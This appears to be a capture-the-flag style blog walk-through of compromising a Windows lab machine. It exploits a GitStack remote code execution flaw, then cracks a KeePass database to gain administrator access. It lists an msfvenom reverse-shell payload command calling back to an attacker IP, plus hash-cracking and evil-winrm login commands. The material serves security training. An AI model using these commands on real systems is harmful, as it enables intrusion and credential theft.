Premise

In this walk-through, we went over the windows box named stack and exploited a Gitstack application deployed on the web-server. We escalated our privileges by decrypting the password database.

Skills Learned

  • Git-Stack Exploitation
  • Windows Privilege Escalation
  • Decryption of KeePass Database files .kdbx

Finding the Way In

My first step was to scan the target machine to see what services were running. I found an HTTP server and an SMB server. When I tried to access the web server, I got a “page not found” error, but the debug information gave me some juicy clues, including a few interesting directories: “registration,” “login,” and “gitstack.”

I started by exploring the “login” directory and found a default username and password of “admin/admin”. This was a great start! Next, I checked out the “gitstack” directory and discovered that it was running GitStack version 2.3.10. A quick search for exploits related to this version of GitStack revealed a remote code execution (RCE) vulnerability. This was my ticket in!

Getting a Foothold

I downloaded a Python script that exploited this vulnerability and modified it to include my IP address and the “admin/admin” credentials I had found earlier. I then used the exploit to run a few commands on the target machine, which confirmed that I was running as a user named “john.”

To get a more stable and powerful shell, I used a tool called Metasploit to generate a malicious payload. I then set up a simple web server on my machine to host this payload. I modified my exploit script one more time to tell the target machine to download and run my payload. As soon as it did, I got a Meterpreter session, which is a powerful type of shell that gives you a lot of control over the target machine.

Becoming the Admin

Now that I had a shell, my next goal was to become the administrator of the machine. I noticed a KeePass database file in “john’s” documents folder. KeePass is a password manager, so I knew this file probably contained some valuable credentials.

I downloaded the KeePass database file to my machine and used a tool called keepass2john to extract the password hash from it. I then used another tool called John the Ripper to crack the hash. It didn’t take long to find the password: “princess”.

I installed KeePass on my machine and opened the database file using the password I had just found. Inside, I found the credentials for the administrator account! The password was “secure3apass262”.

With the administrator’s password in hand, I used a tool called evil-winrm to log in to the machine as the administrator. I was now in full control of the “Stack” machine! 🚀

Commands I Used

Here are some of the key commands I used during this process:

  • Scanning for services: nmap
  • Searching for exploits: searchsploit
  • Generating a malicious payload: sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.0.7 LPORT=4545 -f exe -o shell.exe
  • Starting a simple web server: python -m http.server
  • Starting the Metasploit console: msfconsole
  • Using the multi-handler exploit: use exploit/multi/handler
  • Setting the payload: set payload windows/meterpreter/reverse_tcp
  • Downloading a file from the target machine: download "Password Manager.kdbx"
  • Extracting the hash from a KeePass database: keepass2john "Password Manager.kdbx" > hash
  • Cracking the hash with John the Ripper: john --wordlist=/usr/share/wordlists/rockyou.txt hash
  • Logging in as the administrator: evil-winrm -i <IP> -u administrator -p 'secure3apass262'
  • Checking the current user: whoami

Video Walk-through

 

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles